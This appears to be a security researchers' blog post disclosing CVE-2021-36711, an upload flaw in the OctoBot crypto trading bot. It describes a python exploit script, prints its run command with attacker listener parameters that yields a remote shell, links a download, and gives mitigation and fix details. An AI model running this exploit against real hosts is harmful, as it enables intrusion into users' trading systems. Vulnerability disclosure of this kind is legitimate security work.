SmallCell Airspan AirSpot 5410 Buffalo BS-GS Series Buffalo BS-GSL2024/2016P/2016 Series VPN Buffalo VR-S1000 ChainIDE multichain IDE Contec FLEXLAN FXA2000 and FXA3000 series E-lins H685 Wireless Cellular Router F-logic DataCube3 FLIR AX8 Thermal Camera From upload feature to reverse shell, OctoBot Trading Bot | CVE-2021-36711 Hytec Inter HWL-2511-SS ISnex Series Network Monitoring System Ledger Live CSV Injection MultiversX Wallet Exploit MultiversX Web IDE Smart Contracts Playground Exploit Patlite NH-FB series vulnerabilities Planex network camera CS-QR10 and CS-QR20 楽天 Rakuten 5G Turbo R2314M-JP Seiko Skybridge MB-A100/A110 series Seiko Skybridge MB-A200 series SoftBank Wi-Fi Mesh RP562B

[CVE-2021-36711] Sashimi Evil OctoBot Tentacle

Sashimi Evil OctoBot Tentacle is a python script that exploits a vulnerability that lies in the Tentacles upload functionality of the cryptocurrency trading bot OctoBot which is designed to be easy to use and customizable. Indeed, this open source trading bot has the particularity of offering to theirs users the possibility to upload their own trading algorithms.

Sashimi Evil OctoBot Tentacle takes advantage of this feature to upload a malicious crafted package that leads to an arbitrary code execution.

Affected versions

All OctoBot versions until the latest version (0.4.0b12) are vulnerable. However, this exploit will work from version 0.4.0b3 until version 0.4.1.

Proof of concept

(PoC Tested on Octobot 0.4.0b10)

Funny isn't it?

More in depth tutorial video by @CodeMaru:

Requirement

  • Python 3 (Must already have it if you are OctoBot user :D)
    • An OctoBot target host platform.

      As usual the 3 scripts presented are open source and available on GitHub at the following address:

      python3 sashimi.py --RHOST TARGET_IP --RPORT TARGET_PORT --LHOST YOUR_IP --LPORT YOUR_OPEN_PORT

      Be patient for around 3 min, the time to download, create and upload the malicious Tentacle package, and you should have a remote access to the machine. That’s it!

      Mitigation

      To protect against this attack, set a password in your OctoBot platform or add an .htpasswd.

      [Update] A new version, 0.4.4, that fix the vulnerability has been released.

      https://github.com/Drakkar-Software/OctoBot/issues/1966

      Note

      FOR EDUCATIONAL PURPOSE ONLY.

      Reference

      https://nvd.nist.gov/vuln/detail/CVE-2021-36711

      Download

      https://gitlab.com/0xSamy/Sashimi-Evil-OctoBot-Tentacle

        Thanks for reading this article! I hope you could learn something through our research! If you liked what you read, please share and follow us on twitter at @NeroTeamLabs

      Security researchers